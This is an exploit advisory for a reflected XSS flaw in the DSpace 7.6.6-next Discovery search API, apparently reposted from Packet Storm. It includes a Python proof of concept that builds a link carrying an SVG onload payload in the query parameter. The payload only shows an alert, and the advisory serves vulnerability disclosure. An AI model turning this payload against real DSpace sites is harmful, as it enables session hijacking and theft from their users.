Share
## https://sploitus.com/exploit?id=PACKETSTORM:217486
=============================================================================================================================================
    | # Title     : DSpace 7.6.6-next Discovery API Reflected XSS Vulnerability                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://dspace.org/download/                                                                                                |
    =============================================================================================================================================
    
    [+] Summary    : A critical Reflected Cross-Site Scripting (XSS) vulnerability has been identified in DSpace version 7.6.6-next, specifically within the Discovery Search REST API.
    
    The issue arises due to improper input sanitization of the query parameter in the endpoint:
    
    /server/api/discover/search/objects
    
    An attacker can craft a malicious URL containing a specially encoded payload (e.g., SVG-based JavaScript execution) that, when visited by a victim, executes arbitrary JavaScript in the context of the trusted domain.
    
    This vulnerability could allow attackers to:
    
    Hijack user sessions
    
    Steal sensitive data
    
    Perform actions on behalf of authenticated users (including administrators)
    
    The flaw is particularly dangerous because it can be exploited via simple link sharing (phishing/social engineering), without requiring authentication.
    	
    [+] POC   :  
    
    import urllib.parse
    
    target_url = "https://example/server/api/discover/search/objects"
    payload = "<svg onload=alert('XSS_SUCCESS_DOMAIN_'+document.domain)>"
    
    final_url = f"{target_url}?query={urllib.parse.quote(payload)}"
    
    print("-" * 50)
    print(" URL by indoushkq ")
    print("-" * 50)
    print(final_url)
    print("-" * 50)
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================